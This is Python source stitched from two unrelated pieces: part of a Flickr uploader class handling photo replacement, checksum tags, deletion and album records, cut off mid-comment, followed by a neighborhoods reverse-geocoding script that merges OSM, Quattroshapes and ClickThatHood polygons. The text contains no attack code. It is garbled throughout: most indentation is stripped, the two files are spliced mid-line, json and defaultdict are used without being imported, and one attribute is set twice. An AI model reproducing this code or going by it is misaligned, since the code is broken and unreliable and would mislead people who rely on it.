lock = parameter for multiprocessing control of access to DB
(if self.args.processes = 0 then lock can be None
as it is not used)
file = file to be uploaded to replace existing file
file_id = ID of the photo being replaced
oldfile_md5 = Old file MD5 (required to update checksum tag
                          on Flickr)
file_md5 = New file MD5
last_modified = date/time last modification of the file to update
database
cur = current cursor for updating Database
con = current DB connection
"""
if self.args.dry_run:
NP.niceprint('Dry Run Replace:[{!s}]...'
.format(NP.strunicodeout(file)))
return True
NP.niceprint(' Replacing file:[{!s}]'.format(NP.strunicodeout(file)),
verbosity=1)
success = False
try:
# nuflickr.replace accepts both a filename and a file object.
# when using filenames with unicode characters
# - the flickrapi seems to fail with filename
# so I've used photo FileObj and filename='dummy'
photo = open(file.encode('utf-8'), 'rb')\
if NP.is_str_unicode(file)\
else open(file, 'rb')
logging.debug('photo:[%s] type(photo):[%s]', photo, type(photo))
attempts = None
for attempts in range(0, self.xcfg.MAX_UPLOAD_ATTEMPTS):
res_add_tag = None
res_get_info = None
replace_resp = None
try:
if attempts > 0:
NP.niceprint(' Re-Replacing:'
'[{!s}]...[{!s}/{!s} attempts].'
.format(NP.strunicodeout(file),
attempts,
self.xcfg.MAX_UPLOAD_ATTEMPTS),
verbosity=1)
                    # Use fileobj with filename='dummy' to accept unicode file.
replace_resp = self.nuflickr.replace(
filename='dummy',
fileobj=photo,
# fileobj=faw.FileWithCallback(
# file, faw.callback, self.args.verbose_progress),
photo_id=file_id
)
logging.debug('Output for replace_resp: %s',
xml.etree.ElementTree.tostring(
replace_resp,
encoding='utf-8',
method='xml'))
logging.info('replace_resp:[%s]',
faw.is_good(replace_resp))
if faw.is_good(replace_resp):
# Add checksum tag with new md5
get_success, res_add_tag, get_errcode = \
faw.flickrapi_fn(
self.nuflickr.photos.addTags, (),
dict(photo_id=file_id,
tags='checksum:{}'.format(file_md5)),
2, 2, False, caughtcode='055')
if get_success and get_errcode == 0:
# Gets Flickr file info to obtain all tags
# in order to delete checksum tag of old md5
gi_success, res_get_info, gi_errcode = \
faw.flickrapi_fn(
self.nuflickr.photos.getInfo, (),
dict(photo_id=file_id),
2, 2, False, caughtcode='056')
if gi_success and gi_errcode == 0:
# find tag checksum with old md5 to delete it
tag_id = None
for tag in res_get_info\
.find('photo')\
.find('tags')\
.findall('tag'):
if (tag.attrib['raw'] ==
'checksum:{}'.format(oldfile_md5)):
tag_id = tag.attrib['id']
logging.info(' Found tag_id:[%s]',
tag_id)
break
if not tag_id:
                                NP.niceprint(' Can\'t find tag:[checksum:{!s}] '
                                             'for file [{!s}]'
                                             .format(oldfile_md5, file_id))
# break from attempting to update tag_id
break
else:
# delete tag_id with old Md5
logging.info('Removing tag_id:[%s]',
tag_id)
if self.photos_remove_tag(tag_id):
NP.niceprint(
' Tag removed:[{!s}]'
.format(NP.strunicodeout(file)))
else:
NP.niceprint(
'Tag Not removed:[{!s}]'
.format(NP.strunicodeout(file)))
break
# Exceptions for flickr.upload function call handled on the
# outer try/except.
except (IOError, ValueError, httplib.HTTPException):
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='060',
caughtmsg='Caught IOError, ValueError, '
'HTTP exception',
useniceprint=True,
exceptsysinfo=True)
NP.niceerror(caught=True,
caughtprefix='xxx',
caughtcode='061',
caughtmsg='Sleep {!s} and try replacing again'
.format(UPLDR_K.upload_sleep),
useniceprint=True)
NUTIME.sleep(UPLDR_K.upload_sleep)
if attempts == self.xcfg.MAX_UPLOAD_ATTEMPTS - 1:
raise ValueError('Reached maximum number of attempts '
'to replace, skipping')
continue
if (not faw.is_good(replace_resp)) or \
(not faw.is_good(res_add_tag)) or \
(not faw.is_good(res_get_info)):
NP.niceprint('Issue replacing:[{!s}]'
.format(NP.strunicodeout(file)),
logalso=logging.ERROR)
if not faw.is_good(replace_resp):
raise IOError(replace_resp)
if not faw.is_good(res_add_tag):
raise IOError(res_add_tag)
if not faw.is_good(res_get_info):
raise IOError(res_get_info)
NP.niceprint(' Replaced file:[{!s}]'
.format(NP.strunicodeout(file)),
logalso=logging.WARNING)
# Update the db the file uploaded
# Control for when running multiprocessing set locking
litedb.execute(con,
'UPDATE#055',
lock, self.args.processes,
cur,
'UPDATE files SET md5 = ?,last_modified = ? '
'WHERE files_id = ?',
qmarkargs=(file_md5, last_modified, file_id),
dbcaughtcode='055')
# Update the Video Date Taken
self.update_video_date(file_id, file, last_modified)
success = True
except flickrapi.exceptions.FlickrError as ex:
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='080',
caughtmsg='Flickrapi exception on upload(or)replace',
exceptuse=True,
exceptcode=ex.code,
exceptmsg=ex,
useniceprint=True,
exceptsysinfo=True)
# Error: 8: Videos can't be replaced
if ex.code == 8:
NP.niceprint('..Video replace:[{!s}] Delete/uploading...'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.ERROR)
xrow = [file_id, file]
logging.debug('delete/uploading '
'xrow[0].files_id=[%s]'
'xrow[1].file=[%s]',
xrow[0], NP.strunicodeout(xrow[1]))
if self.delete_file(xrow, lock):
NP.niceprint('..Video deleted:[{!s}] for replace!'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.WARNING)
if self.upload_file(lock, file):
NP.niceprint('.Video replaced:[{!s}]'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.WARNING)
else:
NP.niceprint('..Failed upload:[{!s}] for replace!'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.ERROR)
else:
NP.niceprint('..Failed delete:[{!s}] for replace!'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.ERROR)
except lite.Error as err:
NP.niceerror(caught=True,
caughtprefix='+++ DB',
caughtcode='081',
caughtmsg='DB error: [{!s}]'.format(err.args[0]),
useniceprint=True)
# Release the lock on error.
mp.use_lock(lock, False, self.args.processes)
success = False
except Exception:
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='082',
caughtmsg='Caught exception in replace_photo',
exceptsysinfo=True)
success = False
return success
# -------------------------------------------------------------------------
    # delete_file
    #
    # Delete files from flickr
    #
    # When the EXCLUDED_FOLDERS definition changes, you can run the -g
    # or --remove-excluded option in order to remove files previously loaded
#
def delete_file(self, file, lock=None):
""" delete_file
delete file from flickr
file = row of database with (files_id, path)
lock = for use with use_lock to control access to DB
"""
# ---------------------------------------------------------------------
# delete_record_localdb
#
def delete_record_localdb(lock, file):
""" delete_record_localdb
Find out if the file is the last item in a set, if so,
remove the set from the local db
lock = for use with use_lock to control access to DB
file = row of database with (files_id, path)
Use new connection and nucur cursor to ensure commit
"""
con, nucur = litedb.connect(self.xcfg.DB_PATH)
litedb.execute(con,
'SELECT#058:delete_record_localdb',
lock, self.args.processes,
nucur,
'SELECT set_id FROM files WHERE files_id = ?',
qmarkargs=(file[0],),
dbcaughtcode='058')
row = nucur.fetchone()
if row is not None:
litedb.execute(con,
'SELECT#061:delete_record_localdb',
lock, self.args.processes,
nucur,
'SELECT set_id FROM files WHERE set_id = ?',
qmarkargs=(row[0],),
dbcaughtcode='061')
rows = nucur.fetchall()
if len(rows) == 1:
NP.niceprint('File is the last of the set, '
'deleting the set ID: [{!s}]'
.format(str(row[0])))
litedb.execute(
con, 'DELETE#062:delete_record_localdb',
lock, self.args.processes,
nucur,
'DELETE FROM sets WHERE set_id = ?',
qmarkargs=(row[0],),
dbcaughtcode='062')
litedb.execute(
con, 'DELETE#063:delete_record_localdb',
lock, self.args.processes,
nucur,
'DELETE FROM files WHERE files_id = ?',
qmarkargs=(file[0],),
dbcaughtcode='063')
litedb.close(con)
# ---------------------------------------------------------------------
if self.args.dry_run:
NP.niceprint('Dry Run Deleting file:[{!s}]'
.format(NP.strunicodeout(file[1])))
return True
NP.niceprint(' Deleting file:[{!s}]'
.format(NP.strunicodeout(file[1])),
logalso=logging.WARNING)
# Cater for option --no-delete-from-flickr
if not self.args.no_delete_from_flickr:
get_success, _, get_errcode = faw.flickrapi_fn(
self.nuflickr.photos.delete, (),
dict(photo_id=str(file[0])),
2, 2, False, caughtcode='111')
else:
logging.info('no_delete_from_flickr option is enabled:[%s]',
self.args.no_delete_from_flickr)
get_success, _, get_errcode = faw.flickrapi_fn(
self.nuflickr.photos.addTags, (),
dict(photo_id=str(file[0]),
tags='{}'.format(self.args.no_delete_from_flickr)),
2, 2, False, caughtcode='112')
success = False
if ((get_success and get_errcode == 0) or
(not get_success and get_errcode == 1)):
# Error: 1: File already removed from Flickr
delete_record_localdb(lock, file)
NP.niceprint(' Deleted file:[{!s}]'
.format(NP.strunicodeout(file[1])),
logalso=logging.WARNING)
success = True
else:
NP.niceerror(caught=True,
caughtprefix='xxx',
caughtcode='115',
caughtmsg='Failed to delete photo (delete_file)',
useniceprint=True)
return success
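    # Usage sketch (illustrative values): delete one photo recorded in the
    # local DB. `file` mirrors a (files_id, path) row as documented above;
    # lock may be None when self.args.processes == 0.
    #
    #     row = (123456789, '/photos/2020/img_0001.jpg')
    #     if self.delete_file(row, lock=None):
    #         NP.niceprint('Deleted from Flickr and local DB')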
# -------------------------------------------------------------------------
# log_set_creation
#
# Creates on flickrdb local database a SetName(Album)
#
def log_set_creation(self, lock,
set_id, setname,
primary_photo_id,
cur, con):
""" log_set_creation
Creates on flickrdb local database a SetName(Album)
with Primary photo Id.
Assigns Primary photo Id to set on the local DB.
Also updates photo DB entry with its set_id
"""
NP.niceprint(' Add set to DB:[{!s}]'
.format(NP.strunicodeout(setname)),
verbosity=1, logalso=logging.WARNING)
if litedb.execute(con, 'INSERT#094', lock, self.args.processes,
cur,
'INSERT INTO sets (set_id, name, primary_photo_id) '
'VALUES (?,?,?)',
qmarkargs=(set_id, setname, primary_photo_id),
dbcaughtcode='094'):
litedb.execute(con, 'UPDATE#095', lock, self.args.processes,
cur,
'UPDATE files SET set_id = ? WHERE files_id = ?',
qmarkargs=(set_id, primary_photo_id),
dbcaughtcode='095')
return True
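    # Illustrative outcome (hypothetical ids): after log_set_creation the
    # local DB holds
    #     sets:  (set_id='72157...', name='Holidays', primary_photo_id='5034...')
    #     files: the row with files_id='5034...' now carries set_id='72157...'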
# -------------------------------------------------------------------------
# run
#
    # Run in daemon mode: runs upload every SLEEP_TIME seconds
#
def run(self):
""" run
        Run in daemon mode: runs upload every SLEEP_TIME seconds.
"""
NP.niceprint('Daemon mode run.',
logalso=logging.WARNING)
while True:
NP.niceprint(' Daemon mode go:[{!s}]'
.format(NUTIME.strftime(
UPLDR_K.TimeFormat)))
# run upload
self.upload()
NP.niceprint('Daemon mode out:[{!s}]'
.format(str(NUTIME.asctime(time.localtime()))))
NP.niceprint(' Daemon wait:[{!s}] seconds.'
.format(self.xcfg.SLEEP_TIME),
logalso=logging.WARNING)
NUTIME.sleep(self.xcfg.SLEEP_TIME)
# ---------------------------------------------------------------------
# fn_add_filestosets
#
# Processing function for adding files to set in multiprocessing mode
#
def fn_add_filestosets(self, lockdb, running, mutex, sfiles, c_total, cur):
""" fn_add_filestosets
"""
# CODING pylint
# pylint: disable=unused-argument
        # CODING Use a
# scripts/geodata/neighborhoods/reverse_geocode.py
# -*- coding: utf-8 -*-
import argparse
import logging
import operator
import os
import re
import six
import subprocess
import sys
import yaml
this_dir = os.path.realpath(os.path.dirname(__file__))
sys.path.append(os.path.realpath(os.path.join(os.pardir, os.pardir)))
from geodata.address_formatting.formatter import AddressFormatter
from geodata.coordinates.conversion import latlon_to_decimal
from geodata.encoding import safe_decode
from geodata.file_utils import ensure_dir, download_file
from geodata.i18n.unicode_properties import get_chars_by_script
from geodata.i18n.word_breaks import ideographic_scripts
from geodata.names.deduping import NameDeduper
from geodata.osm.admin_boundaries import OSMNeighborhoodPolygonReader
from geodata.osm.components import osm_address_components
from geodata.osm.definitions import osm_definitions
from geodata.osm.extract import parse_osm, osm_type_and_id, NODE, WAY, RELATION, OSM_NAME_TAGS
from geodata.polygons.index import *
from geodata.polygons.reverse_geocode import QuattroshapesReverseGeocoder, OSMCountryReverseGeocoder, OSMReverseGeocoder
from geodata.statistics.tf_idf import IDFIndex
class NeighborhoodDeduper(NameDeduper):
# Lossless conversions only
replacements = {
u'saint': u'st',
u'and': u'&',
u'〇': u'0',
u'一': u'1',
u'二': u'2',
u'三': u'3',
u'四': u'4',
u'五': u'5',
u'六': u'6',
u'七': u'7',
u'八': u'8',
u'九': u'9',
u'十': u'10',
}
discriminative_words = set([
# Han numbers
u'〇', u'一',
u'二', u'三',
u'四', u'五',
u'六', u'七',
u'八', u'九',
u'十', u'百',
u'千', u'万',
u'億', u'兆',
u'京', u'第',
# Roman numerals
u'i', u'ii',
u'iii', u'iv',
u'v', u'vi',
u'vii', u'viii',
u'ix', u'x',
u'xi', u'xii',
u'xiii', u'xiv',
u'xv', u'xvi',
u'xvii', u'xviii',
u'xix', u'xx',
# English directionals
u'north', u'south',
u'east', u'west',
u'northeast', u'northwest',
u'southeast', u'southwest',
        # Spanish, Portuguese and Italian directionals
u'norte', u'nord', u'sur', u'sul', u'sud',
u'est', u'este', u'leste', u'oeste', u'ovest',
# New in various languages
u'new',
u'nova',
u'novo',
u'nuevo',
u'nueva',
u'nuovo',
u'nuova',
# Qualifiers
u'heights',
u'hills',
u'upper', u'lower',
u'little', u'great',
u'park',
u'parque',
u'village',
])
stopwords = set([
u'cp',
u'de',
u'la',
u'urbanizacion',
u'do',
u'da',
u'dos',
u'del',
u'community',
u'bairro',
u'barrio',
u'le',
u'el',
u'mah',
u'раион',
u'vila',
u'villa',
u'kampung',
u'ahupua`a',
])
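# Sketch (assumed NameDeduper behaviour): with the replacements and stopwords
# above, variant pairs such as u'Saint Andrews' / u'St Andrews' should reduce
# to comparable token sets, so a similarity check like
#
#     sim = NeighborhoodDeduper.compare(u'Saint Andrews', u'St Andrews', idf)
#
# (the same call used further below against OSM names) is expected to score
# lossless-replacement variants close to 1.0.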
class ClickThatHoodReverseGeocoder(GeohashPolygonIndex):
persistent_polygons = False
cache_size = 0
SCRATCH_DIR = '/tmp'
# Contains accurate boundaries for neighborhoods sans weird GeoPlanet names like "Adelphi" or "Crown Heights South"
NEIGHBORHOODS_REPO = 'https://github.com/codeforamerica/click_that_hood'
config_path = os.path.join(this_dir, os.pardir, os.pardir, os.pardir,
'resources', 'neighborhoods', 'click_that_hood.yaml')
    config = yaml.safe_load(open(config_path))
@classmethod
def clone_repo(cls, path):
subprocess.check_call(['rm', '-rf', path])
subprocess.check_call(['git', 'clone', cls.NEIGHBORHOODS_REPO, path])
@classmethod
def create_neighborhoods_index(cls):
scratch_dir = cls.SCRATCH_DIR
repo_path = os.path.join(scratch_dir, 'click_that_hood')
cls.clone_repo(repo_path)
data_path = os.path.join(repo_path, 'public', 'data')
neighborhoods_dir = os.path.join(scratch_dir, 'neighborhoods')
ensure_dir(neighborhoods_dir)
index = cls(save_dir=neighborhoods_dir)
for c in cls.config['files']:
filename = c['filename']
component = c['component']
path = os.path.join(data_path, filename)
features = json.load(open(path))['features']
for f in features:
f['properties']['component'] = component
try:
index.add_geojson_like_file(features)
except ValueError:
continue
return index
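    # Usage sketch: build the index once, then reuse it for point-in-polygon
    # queries (point_in_poly with return_all=True is how these indices are
    # queried later in this module):
    #
    #     cth = ClickThatHoodReverseGeocoder.create_neighborhoods_index()
    #     matches = cth.point_in_poly(40.67, -73.96, return_all=True)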
class OSMNeighborhoodReverseGeocoder(OSMReverseGeocoder):
persistent_polygons = False
cache_size = 10000
simplify_polygons = False
polygon_reader = OSMNeighborhoodPolygonReader
include_property_patterns = OSMReverseGeocoder.include_property_patterns | set(['postal_code'])
cache_size = 0
SCRATCH_DIR = '/tmp'
@classmethod
def create_neighborhoods_index(cls, osm_neighborhoods_file):
scratch_dir = cls.SCRATCH_DIR
neighborhoods_dir = os.path.join(scratch_dir, 'neighborhoods', 'index')
ensure_dir(neighborhoods_dir)
return cls.create_from_osm_file(osm_neighborhoods_file, output_dir=neighborhoods_dir)
class NeighborhoodReverseGeocoder(RTreePolygonIndex):
'''
Neighborhoods are very important in cities like NYC, SF, Chicago, London
and many others. We want the address parser to be trained with addresses
that sufficiently capture variations in address patterns, including
neighborhoods. Quattroshapes neighborhood data (in the US at least)
    is not great in terms of names, mostly because GeoPlanet has so many
incorrect names. The neighborhoods project, also known as ClickThatHood
has very accurate polygons with correct names, but only for a handful
of cities. OSM usually lists neighborhoods and some other local admin
areas like boroughs as points rather than polygons.
This index merges all of the above data sets in prioritized order
(ClickThatHood > OSM > Quattroshapes) to provide unified point-in-polygon
    tests for neighborhoods. The properties vary by source, but each source
    has at least a "name" key, which in practice is what we care about.
'''
PRIORITIES_FILENAME = 'priorities.json'
DUPE_THRESHOLD = 0.9
persistent_polygons = True
cache_size = 100000
source_priorities = {
'osm': 0, # Best names/polygons, same coordinate system
'osm_cth': 1, # Prefer the OSM names if possible
'clickthathood': 2, # Better names/polygons than Quattroshapes
'osm_quattro': 3, # Prefer OSM names matched with Quattroshapes polygon
'quattroshapes': 4, # Good results in some countries/areas
}
level_priorities = {
'neighborhood': 0,
'local_admin': 1,
}
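    # Sketch (not part of the original flow): merged candidates could be
    # ranked by source quality first and admin level second, e.g.:
    #
    #     candidates.sort(key=lambda props: (
    #         cls.source_priorities[props['source']],
    #         cls.level_priorities[props['polygon_type']]))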
regex_replacements = [
        # Paris arrondissements, listed like "PARIS-1ER-ARRONDISSEMENT" in Quattroshapes
        (re.compile(r'^paris-(?=[\d])', re.I), ''),
        (re.compile(r'^prague(?= [\d]+$)', re.I), 'Praha'),
]
quattroshapes_city_district_patterns = [
six.u('Praha [\d]+'),
]
quattroshapes_city_district_regex = re.compile('|'.join([six.u('^\s*{}\s*$').format(p) for p in quattroshapes_city_district_patterns]), re.I | re.U)
@classmethod
def count_words(cls, s):
doc = defaultdict(int)
for t, c in NeighborhoodDeduper.content_tokens(s):
doc[t] += 1
return doc
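    # e.g. count_words(u'Crown Heights South') yields a term-frequency bag
    # such as {u'crown': 1, u'heights': 1, u'south': 1}, assuming
    # content_tokens lowercases and splits on word boundaries.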
@classmethod
def create_from_osm_and_quattroshapes(cls, filename, quattroshapes_dir, country_rtree_dir, osm_rtree_dir, osm_neighborhood_borders_file, output_dir):
'''
Given an OSM file (planet or some other bounds) containing neighborhoods
as points (some suburbs have boundaries)
and their dependencies, create an R-tree index for coarse-grained
reverse geocoding.
Note: the input file is expected to have been created using
osmfilter. Use fetch_osm_address_data.sh for planet or copy the
admin borders commands if using other geometries.
'''
index = cls(save_dir=output_dir)
logger = logging.getLogger('neighborhoods')
qs_scratch_dir = os.path.join(quattroshapes_dir, 'qs_neighborhoods')
ensure_dir(qs_scratch_dir)
logger.info('Creating ClickThatHood neighborhoods')
cth = ClickThatHoodReverseGeocoder.create_neighborhoods_index()
logger.info('Creating OSM neighborhoods')
osmn = OSMNeighborhoodReverseGeocoder.create_neighborhoods_index(osm_neighborhood_borders_file)
logger.info('Creating Quattroshapes neighborhoods')
qs = QuattroshapesNeighborhoodsReverseGeocoder.create_neighborhoods_index(quattroshapes_dir, qs_scratch_dir)
country_rtree = OSMCountryReverseGeocoder.load(country_rtree_dir)
osm_admin_rtree = OSMReverseGeocoder.load(osm_rtree_dir)
osm_admin_rtree.cache_size = 1000
logger.info('Creating IDF index')
idf = IDFIndex()
char_scripts = get_chars_by_script()
for idx in (cth, qs, osmn):
            for i in six.moves.xrange(idx.i):
props = idx.get_properties(i)
name = props.get('name')
if name is not None:
doc = cls.count_words(name)
idf.update(doc)
for key, attrs, deps in parse_osm(filename):
for k, v in six.iteritems(attrs):
if any((k.startswith(name_key) for name_key in OSM_NAME_TAGS)):
doc = cls.count_words(v)
idf.update(doc)
for i in six.moves.xrange(osmn.i):
props = osmn.get_properties(i)
poly = osmn.get_polygon(i)
props['source'] = 'osm'
props['component'] = AddressFormatter.SUBURB
props['polygon_type'] = 'neighborhood'
index.index_polygon(poly.context)
index.add_polygon(poly.context, props)
qs.matched = [False] * qs.i
cth.matched = [False] * cth.i
logger.info('Matching OSM points to neighborhood polygons')
# Parse OSM and match neighborhood/suburb points to Quattroshapes/ClickThatHood polygons
num_polys = 0
for element_id, attrs, deps in parse_osm(filename):
try:
lat, lon = latlon_to_decimal(attrs['lat'], attrs['lon'])
except ValueError:
continue
osm_name = attrs.get('name')
if not osm_name:
continue
id_type, element_id = element_id.split(':')
        element_id = int(element_id)
        # Record type/id on the element's own attrs (props is reused below
        # for candidate polygon properties).
        attrs['type'] = id_type
        attrs['id'] = element_id
possible_neighborhood = osm_definitions.meets_definition(attrs, osm_definitions.EXTENDED_NEIGHBORHOOD)
is_neighborhood = osm_definitions.meets_definition(attrs, osm_definitions.NEIGHBORHOOD)
country, candidate_languages = country_rtree.country_and_languages(lat, lon)
        component_name = osm_address_components.component_from_properties(country, attrs)
ranks = []
osm_names = []
for key in OSM_NAME_TAGS:
name = attrs.get(key)
if name:
osm_names.append(name)
for name_key in OSM_NAME_TAGS:
osm_names.extend([v for k, v in six.iteritems(attrs) if k.startswith('{}:'.format(name_key))])
for idx in (cth, qs):
candidates = idx.get_candidate_polygons(lat, lon, return_all=True)
if candidates:
max_sim = 0.0
arg_max = None
normalized_qs_names = {}
for osm_name in osm_names:
contains_ideographs = any(((char_scripts[ord(c)] or '').lower() in ideographic_scripts
for c in safe_decode(osm_name)))
for i in candidates:
props = idx.get_properties(i)
name = normalized_qs_names.get(i)
if not name:
name = props.get('name')
if not name:
continue
for pattern, repl in cls.regex_replacements:
name = pattern.sub(repl, name)
normalized_qs_names[i] = name
if is_neighborhood and idx is qs and props.get(QuattroshapesReverseGeocoder.LEVEL) != 'neighborhood':
continue
if not contains_ideographs:
sim = NeighborhoodDeduper.compare(osm_name, name, idf)
else:
# Many Han/Hangul characters are common, shouldn't use IDF
sim = NeighborhoodDeduper.compare_ideographs(osm_name, name)
if sim > max_sim:
max_sim = sim
poly = idx.get_polygon(i)
arg_max = (max_sim, props, poly.context, idx, i)
if arg_max:
ranks.append(arg_max)
ranks.sort(key=operator.itemgetter(0), reverse=True)
if ranks and ranks[0][0] >= cls.DUPE_THRESHOLD:
score, props, poly, idx, i = ranks[0]
existing_osm_boundaries = osm_admin_rtree.point_in_poly(lat, lon, return_all=True)
existing_neighborhood_boundaries = osmn.point_in_poly(lat, lon, return_all=True)
skip_node = False
for boundaries in (existing_osm_boundaries, existing_neighborhood_boundaries):
for poly_index, osm_props in enumerate(boundaries):
containing_component = None
name = osm_props.get('name')
                    # Only exact name matches here since we're comparing OSM to OSM
if name and name.lower() != attrs.get('name', '').lower():
continue
if boundaries is existing_neighborhood_boundaries:
containing_component = AddressFormatter.SUBURB
skip_node = True
break
else:
containing_ids = [(boundary['type'], boundary['id']) for boundary in existing_osm_boundaries[poly_index + 1:]]
containing_component = osm_address_components.component_from_properties(country, osm_props, containing=containing_ids)
if containing_component and containing_component != component_name and AddressFormatter.component_order[containing_component] <= AddressFormatter.component_order[AddressFormatter.CITY]:
skip_node = True
break
if skip_node:
break
# Skip this element
if skip_node:
continue
if idx is cth:
if props['component'] == AddressFormatter.SUBURB:
attrs['polygon_type'] = 'neighborhood'
elif props['component'] == AddressFormatter.CITY_DISTRICT:
attrs['polygon_type'] = 'local_admin'
else:
continue
source = 'osm_cth'
else:
level = props.get(QuattroshapesReverseGeocoder.LEVEL, None)
source = 'osm_quattro'
if level == 'neighborhood':
attrs['polygon_type'] = 'neighborhood'
else:
attrs['polygon_type'] = 'local_admin'
containing_ids = [(boundary['type'], boundary['id']) for boundary in existing_osm_boundaries]
component = osm_address_components.component_from_properties(country, attrs, containing=containing_ids)
attrs['component'] = component
attrs['source'] = source
index.index_polygon(poly)
index.add_polygon(poly, attrs)
idx.matched[i] = True
num_polys += 1
if num_polys % 1000 == 0 and num_polys > 0:
logger.info('did {} neighborhoods'.format(num_polys))
for idx, source in ((cth, 'clickthathood'), (qs, 'quattroshapes')):
            for i in six.moves.xrange(idx.i):
props = idx.get_properties(i)
poly = idx.get_polygon(i)
if idx.matched[i]:
continue
props['source'] = source
if idx is cth:
component = props['component']
if component == AddressFormatter.SUBURB:
                    props['polygon_type'] = 'neighborhood'